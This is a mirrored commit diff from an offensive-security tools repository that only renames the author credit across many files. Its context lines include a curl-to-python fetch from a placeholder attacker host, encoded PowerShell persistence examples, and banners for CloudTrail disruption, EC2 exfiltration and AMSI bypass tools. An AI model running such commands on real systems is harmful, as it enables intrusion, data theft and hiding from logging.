Git/mgeeky-Penetration-Testing-Tools
1
0
Fork 0
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git synced 2024-12-22 09:05:06 +01:00
Code Issues Packages Projects Releases Wiki Activity

updates

Browse Source
This commit is contained in:
Mariusz B. / mgeeky 2021-10-24 23:11:42 +02:00
parent 2e115fe796
commit 558762a498
78 changed files with 124 additions and 124 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
README.md
View File

@ -36,6 +36,6 @@ This and other projects are outcome of sleepless nights and **plenty of hard wor
---
```
Mariusz B. / mgeeky, (@mariuszbit)
Mariusz Banach / mgeeky, (@mariuszbit)
<mb [at] binary-offensive.com>
```

8
clouds/aws/README.md
View File

@ -33,7 +33,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --help
:: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
usage: disruptCloudTrailByS3Lambda.py [options] <region> [trail_name]
@ -64,7 +64,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --access-key ASIAXXXXXXXXXXXXXXXX
:: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
[.] Will be working on Account ID: 712800000000
[.] Step 1: Determine trail to disrupt
@ -181,7 +181,7 @@ attacker $ python3 ./exfiltrate-ec2.py --help
:: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE]
[--access-key ACCESS_KEY] [--secret-key SECRET_KEY]
@ -236,7 +236,7 @@ attacker $ python3 ./exfiltrate-ec2.py --region us-east-1 -v --profile default -
:: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
[.] Using attacker's profile: default
[.] Using victim's profile: victim-profile

2
clouds/aws/assume-role-helper.sh
View File

@ -3,7 +3,7 @@
# This script simply calls `aws sts assume-role` using hardcoded parameters, in order
# to retrieve set of session credentials and reformat it into ~/.aws/credentials file format.
#
# Mariusz B., mgeeky '19-20
# Mariusz Banach, mgeeky '19-20
#

4
clouds/aws/disruptCloudTrailByS3Lambda.py
View File

@ -38,7 +38,7 @@
# - boto3
# - pytest
#
# Author: Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
# Author: Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
#
@ -427,7 +427,7 @@ def parseOptions(argv):
print('''
:: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <region> [trail_name]')

2
clouds/aws/evaluate-iam-role.sh
View File

@ -5,7 +5,7 @@
# policy statements. Then goes through allowed permissions to pick all of them out.
# Finally, checks every allowed permission against a list of known troublesome ones.
#
# Mariusz B., mgeeky '19, <mb@binary-offensive.com>
# Mariusz Banach, mgeeky '19, <mb@binary-offensive.com>
# v0.1
#

4
clouds/aws/exfiltrate-ec2.py
View File

@ -33,7 +33,7 @@
# WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is
# not recommended to use it during legal AWS Penetration Tests
#
# Author: Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
# Author: Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
#
import sys
@ -422,7 +422,7 @@ def parseOptions(argv):
print('''
:: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
''')
parser = argparse.ArgumentParser(prog = argv[0])

2
clouds/aws/exfiltrateLambdaTasksDirectory.py
View File

@ -9,7 +9,7 @@
#
# $ curl -s https://<ATTACKER>/exfiltrateLambdaTasksDirectory.py | python
#
# Author: Mariusz B., '19, <mb@binary-offensive.com>
# Author: Mariusz Banach, '19, <mb@binary-offensive.com>
#
import zipfile, StringIO

4
clouds/aws/identifyS3Bucket.rb
View File

@ -3,7 +3,7 @@
# This script leverages couple of methods in order to validate that passed
# domain is a S3 bucket indeed.
#
# Mariusz B., 2019, <mb@binary-offensive.com>
# Mariusz Banach, 2019, <mb@binary-offensive.com>
#
require 'resolv'
@ -245,7 +245,7 @@ def main(args)
puts %{
:: Identifies AWS S3 Buckets via couple of methods
Mariusz B. 19', <mb@binary-offensive.com>
Mariusz Banach 19', <mb@binary-offensive.com>
}
if ARGV.length != 1

2
clouds/aws/pentest-ec2-manager/aws-manager.rb
View File

@ -20,7 +20,7 @@
# Requirements:
# - gem "aws-sdk-ec2"
#
# Author: Mariusz B., '19, <mb@binary-offensive.com>
# Author: Mariusz Banach, '19, <mb@binary-offensive.com>
#
require 'aws-sdk-ec2'

2
file-formats/README.md
View File

@ -8,7 +8,7 @@ c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe
:: tamperUpx - a small utility that corrupts UPX-packed executables,
making them much harder to be decompressed & restored.
Mariusz B. / mgeeky, '21
Mariusz Banach / mgeeky, '21
Step 1. Renaming UPX sections...
Renamed UPX section (UPX0 ) => (.text)

2
file-formats/tamperUpx.py
View File

@ -119,7 +119,7 @@ def main(argv):
:: tamperUpx - a small utility that corrupts UPX-packed executables,
making them much harder to be decompressed & restored.
Mariusz B. / mgeeky, '21
Mariusz Banach / mgeeky, '21
''')
if len(argv) < 2:

2
linux/openvas-automate.sh
View File

@ -1,7 +1,7 @@
#!/bin/bash
#
# OpenVAS automation script.
# Mariusz B. / mgeeky, '17
# Mariusz Banach / mgeeky, '17
# v0.2
#

2
linux/prepare-kali.sh
View File

@ -13,7 +13,7 @@
# keeping tools list more or less up-to-date, or to remove tool's pull down entirely from the script
# - only tools that I've found useful at least once are landing in this script.
#
# Mariusz B., '18-'19
# Mariusz Banach, '18-'19
#
# Well, entire Kali installation assume that we are normally working as root on our Kali.

4
networks/CDPFlooder.py
View File

@ -8,7 +8,7 @@
# Python requirements:
# - scapy
#
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, '18, <mb@binary-offensive.com>
#
import sys
@ -202,7 +202,7 @@ def parseOptions(argv):
print('''
:: CDP Flooding / Denial of Service tool
Floods the interface with fake, randomly generated CDP packets.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{}
'''.format(VERSION))

4
networks/HSRPFlooder.py
View File

@ -6,7 +6,7 @@
# Python requirements:
# - scapy
#
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, '18, <mb@binary-offensive.com>
#
import sys
@ -122,7 +122,7 @@ def parseOptions(argv):
print('''
:: HSRP Flooding / Denial of Service tool
Floods the interface with Active router Coup HSRP packets.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{}
'''.format(VERSION))

10
networks/README.md
View File

@ -33,7 +33,7 @@ PS D:\> python3 .\exchangeRecon.py 10.10.10.9
:: Exchange Fingerprinter
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v0.2
[.] Probing for Exchange fingerprints...
@ -141,7 +141,7 @@ bash $ python RoutingAttackKit.py
:: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v0.1
Available attacks:
@ -157,7 +157,7 @@ bash # python RoutingAttackKit.py -t rip-fuzzer -v
:: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v0.1
[.] Using 192.168.1.14 as local/spoof IP address
@ -241,7 +241,7 @@ $ ./VLANHopperDTP.py --help
:: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky, '18
Mariusz Banach / mgeeky, '18
v0.3
usage: ./VLANHopperDTP.py [options]
@ -279,7 +279,7 @@ $ sudo ./VLANHopperDTP.py -i enp5s0f1
:: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky, '18
Mariusz Banach / mgeeky, '18
v0.2
[+] VLAN Hopping IS possible.

4
networks/RoutingAttackKit.py
View File

@ -13,7 +13,7 @@
# Python requirements:
# - scapy
#
# Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
#
import sys
@ -618,7 +618,7 @@ def parseOptions(argv):
print('''
:: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v{}
'''.format(VERSION))

4
networks/VLANHopperDTP.py
View File

@ -39,7 +39,7 @@
# - Add auto-packets capture functionality via tshark/tcpdump to specified out directory
# - Add functionality to auto-scan via arp-scan desired network
#
# Mariusz B. / mgeeky, '18-19, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, '18-19, <mb@binary-offensive.com>
#
import os
@ -724,7 +724,7 @@ def parseOptions(argv):
print('''
:: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky '18-19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '18-19, <mb@binary-offensive.com>
v{}
'''.format(VERSION))

2
networks/dtpscan.py
View File

@ -5,7 +5,7 @@
# the switch's port. This reconessaince will be helpful for performing
# VLAN Hopping attacks.
#
# Mariusz B. / mgeeky, '18
# Mariusz Banach / mgeeky, '18
#
import os

4
networks/exchangeRecon.py
View File

@ -32,7 +32,7 @@
# - packaging
#
# Author:
# Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
#
import re
@ -1300,7 +1300,7 @@ def parseOptions(argv):
print('''
:: Exchange Fingerprinter
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v{}
'''.format(VERSION))

2
networks/host-scanner-via-udp.py
View File

@ -6,7 +6,7 @@
#
# Based on "Black Hat Python" book by Justin Seitz.
#
# Mariusz B.
# Mariusz Banach
#
import os

2
networks/iis_webdav_upload.py
View File

@ -51,7 +51,7 @@ if __name__ == '__main__':
print '\n\tMicrosoft IIS WebDAV Write Code Execution exploit'
print '\t(based on Metasploit HDM\'s <iis_webdav_upload_asp> implementation)'
print '\tMariusz B. / mgeeky, 2016\n'
print '\tMariusz Banach / mgeeky, 2016\n'
host = sys.argv[1]
if not host.startswith('http'):

4
networks/libssh-auth-bypass.py
View File

@ -25,7 +25,7 @@
# Requirements:
# - paramiko
#
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, <mb@binary-offensive.com>
#
import sys
@ -360,7 +360,7 @@ def main():
sys.stderr.write('''
:: CVE-2018-10993 libSSH authentication bypass exploit.
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{}
'''.format(VERSION))

4
networks/networkConfigurationCredentialsExtract.py
View File

@ -5,7 +5,7 @@
# configuration files in order to extract plain and cipher passwords out of them.
# Equipped with functionality to decrypt Cisco Type 7 passwords.
#
# Mariusz B., mgeeky '18-20
# Mariusz Banach, mgeeky '18-20
#
import re
@ -427,7 +427,7 @@ def printResults():
def main(argv):
Logger._out('''
:: Network-configuration Credentials extraction script
Mariusz B. / mgeeky, '18
Mariusz Banach / mgeeky, '18
''')
opts = parseOptions(argv)
if not opts:

8
networks/smtpAudit.py
View File

@ -72,7 +72,7 @@
# - Microsoft Exchange Server 2013
#
# Author:
# Mariusz B. / mgeeky, '17-19,
# Mariusz Banach / mgeeky, '17-19,
# <mb@binary-offensive.com>
#
@ -2958,7 +2958,7 @@ Date: {dateNow}
smtpAudit.py ({VERSION}) - SMTP Server penetration testing / audit tool,
(https://gist.github.com/mgeeky/ef49e5fb6c3479dd6a24eb90b53f9baa)
by Mariusz B. / mgeeky (<mb@binary-offensive.com>)
by Mariusz Banach / mgeeky (<mb@binary-offensive.com>)
.
'''
@ -3698,7 +3698,7 @@ class ParseOptions:
def banner():
sys.stderr.write('''
:: SMTP Black-Box Audit tool.
v{}, Mariusz B. / mgeeky, '17
v{}, Mariusz Banach / mgeeky, '17
'''.format(VERSION))
@ -3828,7 +3828,7 @@ def main(argv):
sys.stderr.write('''
:: SMTP configuration Audit / Penetration-testing tool
Intended to be used as a black-box tool revealing security state of SMTP.
Mariusz B. / mgeeky, '17-19
Mariusz Banach / mgeeky, '17-19
v{}
'''.format(VERSION))

2
networks/smtpvrfy.py
View File

@ -3,7 +3,7 @@
# Simple script intended to abuse SMTP server's VRFY command to leak
# usernames having accounts registered within it.
#
# Mariusz B., 2016
# Mariusz Banach, 2016
#
import socket

2
networks/wpa2-enterprise-utils/initDHCPServer.sh
View File

@ -7,7 +7,7 @@
# Nothing fancy, just set of needed commands. Especially handy when
# used with `startEAPHammer.sh` script.
#
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
#
if [ $# -ne 2 ]; then

2
networks/wpa2-enterprise-utils/massDeauth.sh
View File

@ -5,7 +5,7 @@
# that takes as input list of APs against which should deauth be launched,
# and then attempts that attack.
#
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
#
if [ $# -ne 1 ]; then

2
networks/wpa2-enterprise-utils/startEAPHammer.sh
View File

@ -14,7 +14,7 @@
# Especially handy when used with companion script called:
# `initDHCPServer.sh`
#
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
#
####################################################################

2
others/Contoso-AD-Structure/README.md
View File

@ -5,7 +5,7 @@ Create Contoso Users in Active Directory This script creates 270 + users in Acti
***Original Author: Mark Rhodes - markrhodes@gmail.com - @mrhodes***
***Modified by: Mariusz B., mb@binary-offensive.com - @mgeeky***
***Modified by: Mariusz Banach, mb@binary-offensive.com - @mgeeky***
**To Use:**
Extract all files and run Create-ADStructure.ps1 from an Administrative PowerShell prompt.

4
others/bluetoothObexSpam.py
View File

@ -3,7 +3,7 @@
# with incoming OBEX Object Push requests containing
# specified file.
#
# Mariusz B. / MGeeky, 16'
# Mariusz Banach / MGeeky, 16'
#
# Partially based on `Violent Python` snippets.
# Modules required:
@ -79,7 +79,7 @@ def main():
parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuosly')
print '\nBluetooth file carpet bombing via OBEX Object Push'
print 'Mariusz B. / MGeeky 16\n'
print 'Mariusz Banach / MGeeky 16\n'
(opts, args) = parser.parse_args()

2
others/correlateCrackedHashes.py
View File

@ -14,7 +14,7 @@
# WILL RETURN:
# some-user@example.com,68eacb97d86f0c4621fa2b0e17cabd8c,Test123
#
# Mariusz B. / mgeeky
# Mariusz Banach / mgeeky
#
import sys, os

2
others/encrypt.rb
View File

@ -4,7 +4,7 @@
# In latter case producing encrypted ZIP package that will get decompressed automatically
# after decryption.
#
# Mariusz B., 2016 v0.1
# Mariusz Banach, 2016 v0.1
#
require 'optparse'

2
others/vm-manager.sh
View File

@ -11,7 +11,7 @@
# - scanning for other VMs
# - setting selected VM's IP address within /etc/hosts (and alike) file
#
# Mariusz B. / mgeeky, '16-'19
# Mariusz Banach / mgeeky, '16-'19
# v0.7
#

2
others/xor-key-recovery.py
View File

@ -3,7 +3,7 @@
# Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length
# it searches for proper key that could decrypt cipher into text.
#
# Mariusz B., 2016
# Mariusz Banach, 2016
#
import sys

2
phishing/WMIPersistence.vbs
View File

@ -15,7 +15,7 @@
' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater")
'
' AUTHOR:
' Mariusz B. / mgeeky, '17
' Mariusz Banach / mgeeky, '17
'
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean

2
phishing/decode-spam-headers.py
View File

@ -45,7 +45,7 @@
# - packaging
# - dnspython
#
# Mariusz B. / mgeeky, '21
# Mariusz Banach / mgeeky, '21
# <mb [at] binary-offensive.com>
#

2
phishing/gophish-send-mail/README.md
View File

@ -37,7 +37,7 @@ PS > py .\gophish-send-mail.py .\send-mail-with-gophish.yaml
:: GoPhish Single Mail Send utility
Helping you embellish your emails by sending them one-by-one
Mariusz B. / mgeeky
Mariusz Banach / mgeeky
[+] Template to use:
ID: 22

2
phishing/gophish-send-mail/gophish-send-mail.py
View File

@ -165,7 +165,7 @@ def main(argv):
print('''
:: GoPhish Single Mail Send utility
Helping you embellish your emails by sending them one-by-one
Mariusz B. / mgeeky
Mariusz Banach / mgeeky
''')
template = getTemplate()

2
phishing/phishing-HTML-linter.py
View File

@ -205,7 +205,7 @@ def main(argv):
print('''
:: Phishing HTML Linter
Shows you bad smells in your HTML code that will get your mails busted!
Mariusz B. / mgeeky
Mariusz Banach / mgeeky
''')
html = ''

2
phishing/vba-windows-persistence.vbs
View File

@ -19,7 +19,7 @@
' WindowsPersistence "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater"
'
' AUTHOR:
' Mariusz B. / mgeeky, '17
' Mariusz Banach / mgeeky, '17
'
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean

2
red-teaming/Bypass-ConstrainedLanguageMode/Bypass-CLM.ps1
View File

@ -100,7 +100,7 @@ function Bypass-CLM
Write-Host "`tAppLocker Constrined Language Mode Bypass via COM"
Write-Host "`t(implementation of: @xpn's technique, as documented in:)"
Write-Host "`t(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)"
Write-Host "`n`tRe-implemented, enhanced by: Mariusz B., mgeeky"
Write-Host "`n`tRe-implemented, enhanced by: Mariusz Banach, mgeeky"
Write-Host "`t-----`n"
Write-Host "[.] Step 0. Planted DLL files in:`n`t$dstAssemblyPath`n`t$dstDllPath"

2
red-teaming/Bypass-ConstrainedLanguageMode/Bypass-CLM2.ps1
View File

File diff suppressed because one or more lines are too long

2
red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/main.cpp
View File

@ -2,7 +2,7 @@
* This DLL hosts CLR4 environment from within a native binary. This way it is possible to
* call .NET APIs from an unmanaged runtime.
*
* Mariusz B., mgeeky, 19'
* Mariusz Banach, mgeeky, 19'
*
**/

2
red-teaming/Bypass-ConstrainedLanguageMode/README.md
View File

@ -26,7 +26,7 @@ PS > .\Bypass-CLM.ps1
(implementation of: @xpn's technique, as documented in:)
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
Re-implemented, enhanced by: Mariusz B., mgeeky
Re-implemented, enhanced by: Mariusz Banach, mgeeky
-----
[.] Step 0. Planted DLL files in:

12
red-teaming/C3-Client/README.md
View File

@ -22,7 +22,7 @@ The script offers subcommands-kind of CLI interface, so after every command one
PS> py .\c3-client.py --help
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
usage:
Usage: ./c3-client.py [options] <host> <command> [...]
@ -59,7 +59,7 @@ optional arguments:
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay --help
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
usage: Usage: ./c3-client.py [options] <host> <command> [...] alarm relay [-h] [-e EXECUTE] [-x WEBHOOK] [-g gateway_id]
@ -144,7 +144,7 @@ This example shows how to keep all of your Relays pinged every 45 seconds:
PS D:\> py c3-client.py http://192.168.0.200:52935 ping -k 45
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[.] Sending a ping every 45 seconds.
[.] Pinged relay: matter4 from gateway gate4
@ -170,7 +170,7 @@ Ever suffered from a poor C3 bandwidth or general performance? Worry not - you c
PS D:\> py .\c3-client.py http://192.168.0.200:52935 channel all clear
:: C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[.] LDAP: Clearing messages queue...
[+] Cleared LDAP attribute value on C3 channel 3 on Relay matter4 on gateway gate4
@ -213,7 +213,7 @@ In this example setup an alarm that triggers upon new Relay checking-in. Wheneve
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay -g gate4 --execute "powershell -file speak.ps1 -message \`"New C3 Relay Inbound: <domain>/<userName>, computer: <computerName>\`""
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[.] Entering infinite-loop awaiting for new Relays...
[+] New Relay checked-in!
@ -325,6 +325,6 @@ py c3-client.py http://192.168.0.200:52935 ping -k 45
## Author
```
Mariusz B. / mgeeky, '21
Mariusz Banach / mgeeky, '21
<mb [at] binary-offensive.com>
```

2
red-teaming/C3-Client/c3-client.py
View File

@ -2036,7 +2036,7 @@ def parseArgs(argv):
def main(argv):
print('''
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
''')
parseArgs(argv)

2
red-teaming/Count-PrivilegedGroupMembers.ps1
View File

@ -8,7 +8,7 @@
PS> . .\Count-PrivilegedGroupMembers.ps1
PS> Count-PrivilegedGroupMembers
Mariusz B. / mgeeky
Mariusz Banach / mgeeky
#>
# This script requires PowerView 3.0 dev branch

2
red-teaming/Disable-Amsi.ps1
View File

@ -5,7 +5,7 @@
Attempts to disable AMSI within current process using well-known techniques laid out in an unsignatured way.
Author: Mariusz B. (@mgeeky)
Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

2
red-teaming/Disable-ScriptLogging.ps1
View File

@ -5,7 +5,7 @@
Attempts to disable Script Block logging within current process using well-known techniques laid out in an unsignatured way.
Author: Mariusz B. (@mgeeky)
Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

2
red-teaming/Export-ReconData.ps1
View File

@ -5,7 +5,7 @@
files for later processing. This script is compatible with newest PowerView's version,
from dev branch (as of 2018) that uses Get-Domain*, Find-* (instead of Invoke-*) and others cmdlets.
Author: Mariusz B. (mgeeky), '18
Author: Mariusz Banach (mgeeky), '18
License: BSD 3-Clause
Required Dependencies: PowerSploit's Recon.psm1
#>

6
red-teaming/Get-DomainOUTree.ps1
View File

@ -1,7 +1,7 @@
#requires -version 2
<#
Author: Mariusz B. (@mgeeky)
Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause
Required Dependencies: PowerView.ps1
Optional Dependencies: None
@ -12,7 +12,7 @@ function Get-DomainOUTree
<#
.SYNOPSIS
Author: Mariusz B. (@mgeeky)
Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause
Required Dependencies: PowerView.ps1
Optional Dependencies: None
@ -65,7 +65,7 @@ function Get-NetOUTree
<#
.SYNOPSIS
Author: Mariusz B. (@mgeeky)
Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause
Required Dependencies: PowerView.ps1
Optional Dependencies: None

2
red-teaming/Get-UserPasswordEntries.ps1
View File

@ -8,7 +8,7 @@
PS> . .\Get-UserPasswordEntries.ps1
PS> Get-UserPasswordEntries
Mariusz B. / mgeeky
Mariusz Banach / mgeeky
#>
# This script requires PowerView 3.0 dev branch

12
red-teaming/README.md
View File

@ -15,7 +15,7 @@ PS > .\Bypass-CLM.ps1
(implementation of: @xpn's technique, as documented in:)
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
Re-implemented, enhanced by: Mariusz B., mgeeky
Re-implemented, enhanced by: Mariusz Banach, mgeeky
-----
[.] Step 0. Planted DLL files in:
@ -180,7 +180,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE.
@ -189,7 +189,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
<!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> -->
<!-- by Mariusz Banach / mgeeky <mb@binary-offensive.com> -->
<Target Name="btLDoraXcZV">
<hwiJYmWvD />
@ -237,7 +237,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE.
@ -363,7 +363,7 @@ SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200)
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
Mariusz B. / mgeeky, '19 <mb@binary-offensive.com>
Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
[.] Will load script file: '.\Test2.ps1'
[+] AMSI Disabled.
@ -395,7 +395,7 @@ This script contains malicious content and has been blocked by your antivirus so
PS D:\> .\Stracciatella.exe -v
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
Mariusz B. / mgeeky, '19 <mb@binary-offensive.com>
Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
[-] It looks like no script path was given.
[+] AMSI Disabled.

2
red-teaming/Save-ReconData.ps1
View File

@ -5,7 +5,7 @@
This script launches many PowerView cmdlets and stores their output
in Clixml files for later processing.
Author: Mariusz B. (mgeeky), '18
Author: Mariusz Banach (mgeeky), '18
License: BSD 3-Clause
Required Dependencies: PowerSploit's Recon.psm1
#>

2
red-teaming/code-exec-templates/download-file-and-exec.vbs
View File

@ -2,7 +2,7 @@
' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'

2
red-teaming/code-exec-templates/download-powershell-and-exec-via-stdin.vbs
View File

@ -2,7 +2,7 @@
' Example of downloading a binary file from the URL, saving it to the
' local filesystem and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'

2
red-teaming/code-exec-templates/drop-binary-file-and-launch.vbs
View File

@ -2,7 +2,7 @@
' Example of dropping an embedded, base64 encoded binary file to the disk,
' decoding it and then launching.
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'

2
red-teaming/code-exec-templates/wmi-exec-command.vbs
View File

@ -2,7 +2,7 @@
' This script uses WMI class' Win32_Process static method Create to
' execute given command in a hidden window (ShowWindow = 12).
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'

2
red-teaming/code-exec-templates/wscript-shell-code-exec.vbs
View File

@ -2,7 +2,7 @@
' This script uses classic WScript.Shell Run method to
' execute given command in a hidden window (second param = 0)
'
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'

2
red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs
View File

@ -3,7 +3,7 @@
' execute given command in a hidden window via StdIn passed to a dedicated
' launcher command (powershell.exe in this example).
'
